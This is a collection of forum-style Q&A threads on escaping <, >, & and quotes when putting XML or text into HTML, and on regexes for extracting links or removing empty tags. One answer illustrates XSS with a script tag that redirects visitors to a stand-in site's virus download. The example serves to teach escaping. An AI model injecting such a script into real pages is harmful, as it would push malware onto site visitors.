In the HTML file, I need to show some XML code. The problem is that I can't use
<pre>..</pre>
to show '<' and '>'.
What would be the solution for this problem?
ADDED
From the answer, replacing '<' and '>' with &lt; and &gt; can be a solution. I'm an Emacs user; are there Emacs tools/magic to do that automatically? I mean, I can use search and replace, but I expect Emacs can do it by 'select region' -> 'M-x replace_xml' or something.
You need to escape < as &lt; and & as &amp;. Optionally, for consistency, you can escape > as &gt;.
To do this automatically in Emacs, if you're in HTML mode, you can select the code that you would like to escape, and run M-x sgml-quote.
You need to replace < by &lt; and > by &gt;. How to do this depends on the server side language in question.
Update: as per your update: this is not programming related anymore. I think http://superuser.com is a better place to ask software related questions.
As already mentioned, you need to escape the XML. For robustness I would also escape single and double quotes. Note that CDATA and <pre> can cause you problems if, for any reason, your XML document includes ]]> or </pre> in it.
You can get away with doing a straight string substitution for the escaping, but if you do, make sure you escape & to &amp; before doing any of the other escapes.
As others have noted, you need to escape the XML markup to display it in HTML.
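Why the order matters can be shown with a short Python sketch. The function names `escape_correct` and `escape_naive` are made up for this illustration; in real code the standard library's `html.escape` already does the substitutions in a safe order.

```python
def escape_correct(text: str) -> str:
    """Escape & first, then < and >, so new entities are not re-escaped."""
    return (text.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;"))


def escape_naive(text: str) -> str:
    """Wrong order: the & inside the freshly created &lt; gets escaped again."""
    return (text.replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace("&", "&amp;"))


sample = '<a href="x?a=1&b=2">'
print(escape_correct(sample))  # &lt;a href="x?a=1&amp;b=2"&gt;
print(escape_naive(sample))    # &amp;lt;a href="x?a=1&amp;b=2"&amp;gt;
```

With the naive order, a browser would display the literal text `&lt;` instead of `<`.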
Take a look at xmlverbatim stylesheet: It does that as well as pretty printing and colorizing.
If you google around there are several stylesheets to do similar formatting.
Select the region
Do M-% < RET &lt; RET !
Do a substitution using a programming language without Emacs.
For Python:
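import shutil

# Make a copy just in case ("input.xml" is a placeholder file name).
shutil.copy("input.xml", "input.xml.bak")
# Open the file and read its contents.
with open("input.xml", encoding="utf-8") as f:
    text = f.read()
# Escape & first, then < and >, so new entities are not escaped twice.
text = text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
# Output to file ("output.html" is also a placeholder).
with open("output.html", "w", encoding="utf-8") as f:
    f.write(text)
# Enjoy!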
In PHP, there is a function called htmlspecialchars() that performs the following substitutions on a string:
& (ampersand) is converted to &amp;
" (double quote) is converted to &quot;
' (single quote) is converted to &#039; (only if the flag ENT_QUOTES is set)
< (less than) is converted to &lt;
> (greater than) is converted to &gt;
Apparently, this is done on the grounds that these 5 specific characters are the unsafe HTML characters.
I can understand why the last two are considered unsafe: if they are simply "echoed", arbitrary/dangerous HTML could be delivered, including potential javascript with <script> and all that.
Question 1. Why are the first three characters (ampersand, double quote, single quote) also considered 'unsafe'?
Also, I stumbled upon this library called "he" on GitHub (by Mathias Bynens), which is about encoding/decoding HTML entities. There, I found the following:
[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]
(source)
Question 2. Is there a good reason for considering the backtick another unsafe HTML character? If yes, does this mean that PHP's function mentioned above is outdated?
Finally, all this begs the question:
Question 3. Are there any other characters that should be considered 'unsafe', alongside those 5/6 characters mentioned above?
Donovan_D's answer pretty much explains it, but I'll provide some examples here of how specifically these particular characters can cause problems.
Those characters are considered unsafe because they are the most obvious ways to perform an XSS (Cross-Site Scripting) attack (or break a page by accident with innocent input).
Consider a comment feature on a website. You submit a form with a textarea. It gets saved into the database, and then displayed on the page for all visitors.
Now I submit a comment that looks like this.
<script type="text/javascript">
window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>
And suddenly, everyone that visits your page is redirected to a virus download. The naive approach here is just to say, okay, well then let's filter out some of the important characters in that attack:
< and > will be replaced with &lt; and &gt; and now suddenly our script isn't a script. It's just some HTML-looking text.
A similar situation arises with a comment like
Something is <<wrong>> here.
Suppose a user used <<...>> for emphasis for some reason. Their comment would render as
Something is <> here.
Obviously not desirable behavior.
A less malicious situation arises with &. & is used to denote HTML entities such as &amp; and &quot; and &lt; etc. So it's fairly easy for innocent-looking text to accidentally be an HTML entity and end up looking very different and very odd to a user.
Consider the comment
I really like #455 &oacute; please let me know when they're available for purchase.
This would be rendered as
I really like #455 ó please let me know when they're available for purchase.
Obviously not intended behavior.
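The effect can be reproduced with a small Python sketch. It uses `html.unescape` as a rough stand-in for what a browser does when it decodes entities in text, and the comment string with `&oacute;` is an assumed example of text that happens to contain an entity.

```python
import html

# Assumed example: user text that happens to contain an entity reference.
comment = "I really like #455 &oacute; please let me know"

# A browser decodes entity references in text; html.unescape mimics that.
rendered_raw = html.unescape(comment)

# Escaping on output turns & into &amp;, so the reader sees what was typed.
escaped = html.escape(comment)
rendered_escaped = html.unescape(escaped)

print(rendered_raw)      # the entity has silently become an accented letter
print(escaped)           # what should be written into the page
print(rendered_escaped)  # what the visitor sees: the original text
```

Escaping the ampersand on output is what keeps the displayed text identical to what the user typed.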
The point is, these symbols were identified as key to preventing most XSS vulnerabilities/bugs most of the time since they are likely to be used in valid input, but need to be escaped to properly render out in HTML.
To your second question, I am personally unaware of any way that the backtick should be considered an unsafe HTML character.
As for your third, maybe. Don't rely on blacklists to filter user input. Instead, use a whitelist of known OK input and work from there.
These characters are unsafe because in HTML the < and > delimit a tag, and the " and ' are used to surround attribute values. The & is encoded because it introduces HTML entities. No other characters need to be encoded, but they can be. For example, the trademark symbol can be written as &trade;, the US dollar sign as &dollar;, and the euro as &euro;. Any emoji can also be written as an HTML entity (the name for these encoded forms). You can find an explanation and examples here.
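To make the point about quotes concrete, here is a minimal Python sketch of an attribute breakout. The `user_input` value and the `<input>` markup are hypothetical; `html.escape` from the standard library is used as the escaping function and plays roughly the role of PHP's htmlspecialchars() with ENT_QUOTES.

```python
import html

# Hypothetical user-supplied value that tries to break out of the attribute.
user_input = '" onmouseover="alert(1)'

# Unsafe: the quote in the input closes value="..." and starts a new attribute.
unsafe = '<input value="' + user_input + '">'

# Safer: html.escape with quote=True (the default) also escapes " and '.
safe = '<input value="' + html.escape(user_input, quote=True) + '">'

print(unsafe)  # <input value="" onmouseover="alert(1)">
print(safe)    # <input value="&quot; onmouseover=&quot;alert(1)">
```

No < or > is needed for this injection, which is why escaping only the angle brackets is not enough inside attribute values.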
I got an input file that I need to print directly into an html page.
I did $inputfile =~ s/\n/<br>/g; Are there any other special characters I should be aware of maybe other than < and > when printing this $inputfile to html?
You absolutely should use HTML::Escape instead of doing some ill-conceived hackjob which will cause everyone who deals with your code (you included) to curse your name in the future.
It's simple - install HTML::Escape via CPAN, then use it thus:
use HTML::Escape qw(escape_html);
my $escaped_string = escape_html($string);
Note that if you want to preserve whitespace formatting you should use a module to do that as well, such as HTML::FromText. The above code will not automagically convert line breaks to <br> tags, because that is completely different from escaping unsafe characters to HTML entities.
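For comparison, the same two-step idea (escape first, then handle line breaks) might look like this in Python. This is only a sketch: `text_to_html` is a made-up helper name, and `html.escape` stands in for what HTML::Escape does in Perl.

```python
import html


def text_to_html(text: str) -> str:
    """Escape unsafe characters first, then turn line breaks into <br> tags."""
    escaped = html.escape(text)
    # Doing the <br> substitution after escaping keeps the inserted tags intact.
    return escaped.replace("\n", "<br>\n")


print(text_to_html("1 < 2\nfish & chips"))
```

If the substitutions were done in the opposite order, the escaping step would turn the inserted `<br>` tags into visible text.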
I'm extracting some content from a website with this pattern:
([^+]+)
and it outputs
< img src=""http://www."" border=""0""/>
with double quotes. What is wrong with my query?
your problem only makes sense if you modify your regexp.
but first of all, beware:
in general, what you try to achieve is not feasible using regexes. they are the inappropriate tool to do it. you will not come up with a solution 100% correct using regexes.
having said this, try to replace ([^+]+) with (([^<!--]+([^<]|<[^!]|<![^-]|<!-[^-]))+). note that this regex assumes the following:
there are no html comments inside the message portion
there are no strings containing html comment openings inside the message portion
the message portion is a valid html fragment
(otherwise it would match eg. <!-<!-- / message -->)
you have been warned.
btw, the dquote doubling must be a standard escape mechanism of the imacro environment.
for example :
I want to remove all highlighted tags
alt text http://shup.com/Shup/299976/110220132930-My-Desktop.png
You could use a regular expression in any editor that supports them. For instance, I tested this one in Dreamweaver:
<(?!\!|input|br|img|meta|hr)[^/>]*?>[\s]*?</[^>]*?>
Just make a search and replace all (with the regex as search string and nothing as replacement). Note however that this may remove necessary whitespace. If you just want to remove empty tags without anything in between,
<(?!\!|input|br|img|meta|hr)[^/>]*?></[^>]*?>
would be the way to go.
Update: You want to remove &nbsp;s as well:
<(?!\!|input|br|img|meta|hr)[^/>]*?>(?:[\s]|&nbsp;)*?</[^>]*?>
I did not verify this one - it should be OK though, try it out :-)
If this is only about quickly editing a file, and your editor supports regular expression replacement, you can use a regex like this:
<[^>]+></[^>]+>
Search for this regex, and replace with an empty string.
Note: This isn't safe in any way - don't rely on it, as it can find more things than just valid, empty tags. (It would also find <a></b> for example.) There is no safe way to do this with regexes - but if you check each replacement manually, you should be fine. If you need real safe replacement, then either you'll have to find an editor that supports this (JEdit may be a good bet, but I haven't checked), or you'll have to parse the file yourself - e.g. using XSLT.
What you're asking for sounds like a job for regular expressions. Many editors support regular expression find/replace. Personally, I'd probably do this from the command-line with Perl (sed would also work), but that's just me.
perl -pe 's|<([^\s>]+)[^>]*></\1>||g' < file.html > new_file.html
or if you're brave, edit the file in place:
perl -pe 's|<([^\s>]+)[^>]*></\1>||g' -i file.html
This will remove:
<p></p>
<p id="foo"></p>
but not:
<p>hello world</p>
<p></a>
Warning: things like <img src="pic.png"></img> and <br></br> will also be removed. It's not obvious from your question, but I'll assume this is undesirable. Maybe you're not worried because you know all your images are declared like this <img src="pic.png"/>. Otherwise the regular expression will need to be modified to account for this, but I decided to start simple for an easier explanation...
It works by matching the opening tag: a literal < followed by the tag name (one or more characters which are not whitespace or > = [^\s>]+), any attributes (zero or more characters which aren't > = [^>]*), and then a literal >; and a closing tag with the same name: this takes advantage of the fact that we captured the tag name, so we can use a backreference = </\1>. The matches are then replaced with the empty string.
If the syntax/terminology used here is unfamiliar to you, I'm a fan of the perlre documentation page. Regular expression syntax in other languages should be very similar if not identical to this, so hopefully this will be useful even if you don't Perl :)
Oh, one more thing. If you have things like <div><p></p></div>, these will not be picked up all at once. You'll have to do multiple passes: the first will remove the <p></p>, leaving a <div></div> to be removed by the second. In Perl, the substitution operator returns the number of replacements made, so you can:
perl -pe '1 while s|<([^\s>]+)[^>]*></\1>||g' < file.html > new_file.html
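The same repeat-until-nothing-changes idea can be sketched in Python with `re.subn`, which returns the number of replacements made. The helper name `strip_empty_tags` is made up for this example, and the regex is the one from the Perl one-liner, so the same caveats about <img></img> and <br></br> apply.

```python
import re

# Same pattern as the Perl one-liner: opening tag, optional attributes,
# then a closing tag whose name matches the captured one.
EMPTY_TAG = re.compile(r"<([^\s>]+)[^>]*></\1>")


def strip_empty_tags(markup: str) -> str:
    """Remove empty open/close pairs repeatedly until none are left."""
    while True:
        markup, count = EMPTY_TAG.subn("", markup)
        if count == 0:
            return markup


print(strip_empty_tags('<div><p id="foo"></p></div><p>hello world</p>'))
# <p>hello world</p>
```

The first pass removes the inner <p id="foo"></p>, the second removes the now-empty <div></div>, and the third finds nothing and stops.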
My text file contains 2 lines:
<IMG SRC="/icons/folder.gif" ALT="[DIR]"> yahoo.com.jp/
</PRE><HR>
In my Perl script, I have:
my $String =~ /.*(HREF=")(.*)(">)/;
print "$2";
and my output is the following:
Output 1: yahoo.com.jp
Output 2: ><HR>
What I am trying to achieve is have my Perl script automatically extract the string inside the <A Href="">
As I am very new to regex, I want to ask if my regex is a badly formed one? If so can someone provide some suggestion to make it look nicer?
Secondly, I do not know why my second output is "><HR>", I thought the expected behavior is that output2 will be skipped since it does not contain HREF=". Obviously I am very wrong.
Thanks for the help.
To answer your specific question about why your regex isn't working: you're using .*, which is "greedy", meaning it will by default match as much as it can. Alternatives would be to use the non-greedy form, .*?, or to be a bit more exacting about what you're trying to match. For instance, [^"]* will match anything that's not a double quote, which seems to be what you're looking for.
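The difference between the three forms is easy to see in a short Python sketch (Python's `re` module treats these quantifiers the same way Perl does). The sample `line` is invented for the illustration.

```python
import re

# Invented sample line with two links on it.
line = '<A HREF="a.html">first</A> <A HREF="b.html">second</A>'

# Greedy: .* runs to the end of the line, then backs up to the LAST ">.
greedy = re.search(r'HREF="(.*)">', line).group(1)
# Non-greedy: .*? stops at the FIRST ">.
lazy = re.search(r'HREF="(.*?)">', line).group(1)
# Negated character class: cannot run past the closing quote at all.
negated = re.search(r'HREF="([^"]*)"', line).group(1)

print(greedy)   # a.html">first</A> <A HREF="b.html
print(lazy)     # a.html
print(negated)  # a.html
```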
But yes, the other posters are correct - using regular expressions to do anything non-trivial in HTML parsing is a recipe for disaster. Technically you can do it properly, especially in Perl 5.10 (which has more advanced regular expression features), but it's usually not worth the headache.
Using regular expressions to parse HTML works just often enough to lull you into a false sense of security. You can get away with it for simple cases where you control the input but you're better off using something like HTML::Parser instead.
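As an illustration of the parser-based approach, here is a minimal sketch using Python's standard `html.parser` module rather than Perl's HTML::Parser. The class name `HrefCollector` and the sample input are made up for the example.

```python
from html.parser import HTMLParser


class HrefCollector(HTMLParser):
    """Collect the href attribute of every <a> tag."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value is not None:
                    self.hrefs.append(value)


collector = HrefCollector()
# Invented sample input, loosely modelled on a directory listing.
collector.feed('<IMG SRC="/icons/folder.gif" ALT="[DIR]"> '
               '<A HREF="example.com/">example.com/</A>\n</PRE><HR>')
print(collector.hrefs)  # ['example.com/']
```

Lines without a link simply produce no entries, so there is no stale match to worry about.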
If I may, I'd like to suggest the simplest way of doing this (it may not be the fastest or lightest-weight way): HTML::TreeBuilder::XPath
It gives you the power of XPath in non-well-formed HTML.
use HTML::TreeBuilder::XPath;
my $tree= HTML::TreeBuilder::XPath->new_from_file( 'D:\Archive\XPath.pm.htm' );
my @hrefs = $tree->findvalues( '//div[@class="noprint"]/a/@href');
print "The links are: ", join( ',', @hrefs ), "\n";
When trying to match against HTML (or XML) with a regex you have to be careful about using .*. Rarely do you want a .* because star is a greedy quantifier that will match as far as it can. As Gumbo showed, use the character class [^"]* to match all characters except a quote. This will match up to the closing quote. You may also want to use something similar for matching the angle bracket. Try this:
/HREF="([^"]*)"[^>]*>/i
That should match much more consistently.